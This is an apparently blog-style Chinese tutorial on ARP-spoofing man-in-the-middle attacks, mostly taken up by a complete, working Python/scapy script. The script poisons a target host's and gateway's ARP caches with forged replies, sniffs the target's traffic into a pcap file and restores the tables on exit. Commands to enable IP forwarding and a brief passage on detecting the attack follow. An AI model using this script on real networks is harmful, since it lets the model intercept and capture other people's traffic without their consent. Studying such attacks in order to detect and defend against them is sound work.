中间人攻击,像数据结构链表中两节点添加新节点类似,渗透人员利用arp协议,向两端攻击目标不断发起ARP响应报文,以替换目标的mac地址,使原有客户端->服务端(网关等)的请求流程,替换为客户端->中间人->服务端。成功后,渗透人员可以利用中间节点对两端流量自由处理。
一、源代码
# -*- coding: UTF-8 -*- import os; import sys; import threading; import signal; from scapy.all import * interface = "en0"; target_ip = "192.168.1.20"; gateway_ip = "192.168.1.1"; packet_count = 1000; # conf.iface = interface; # conf.verb = 0; print ("发包端口 %s" % interface); def get_mac(ip_address): # srp函数(发送和接收数据包,发送指定ARP请求到指定IP地址,然后从返回的数据中获取目标ip的mac) responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10); for s,r in responses: return r[Ether].src; return None; gateway_mac = get_mac(gateway_ip); target_mac = get_mac(target_ip); if target_mac is None: print("目标IP不可达"); else: print("[%s]的mac地址为[%s]" %(target_ip,target_mac)); if gateway_mac is None: print("网关不可达"); else: print("[%s]的mac地址为[%s]" %(gateway_ip,gateway_mac)); #恢复 def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): print("恢复...."); send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5); send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5); os.kill(os.getpid(),signal.SIGINT); #中间人攻击 def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): #网关发给目标主机 poison_target = ARP(); poison_target.op =2; poison_target.psrc = gateway_ip; poison_target.pdst = target_ip; poison_target.hwdst = target_mac; #目标主机发给网关 poison_gateway = ARP(); poison_gateway.op = 2; poison_gateway.psrc = target_ip; poison_gateway.pdst = gateway_ip; poison_gateway.hwdst = gateway_mac print("开始实施攻击...."); while True: try: send(poison_target); send(poison_gateway); time.sleep(2); except KeyboardInterrupt: restore_target(gateway_ip,gateway_mac,target_ip,target_mac); print("攻击结束...."); return; poison_thread = threading.Thread(target= poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac)); poison_thread.start(); try: print("启动抓包程序...."); print("不要忘记开启 IP转发,否则目标IP无法上网。MAC:sudo sysctl -w net.inet.ip.forwarding=1 | linux: echo 1 > /proc/sys/net/ipv4/ip_forward"); bpf_filter = "ip host %s" % target_ip; packets = sniff(count= packet_count,filter=bpf_filter,iface=interface); #启动抓包 wrpcap("arpTest.pcap",packets); #写入pcap文件 except KeyboardInterrupt: restore_target(gateway_ip,gateway_mac,target_ip,target_mac); sys.exit(0);当我们启动程序后,通过wireshark抓包,可见1.20与1.1的对应MAC地址已替换成中间人MAC地址
我们可以通过受攻击目标客户端主机 arp -a命令进行查看,网关地址的MAC已为中间人MAC。
当中间人不开启IP转发时,受攻击客户端无法进行网络通讯。
二、说点其它
中间人攻击带来的危害还是非常大的,不过该问题非常容易发现,我们可以从地址冲突、mac地址查看、网络缓慢或中断等多个维度查看、分析便可快速定位问题点。基于ARP协议,我们还可以做很多有趣的事情,下节分享如何基于ARP生成虚假节点,形成动态防御架构。
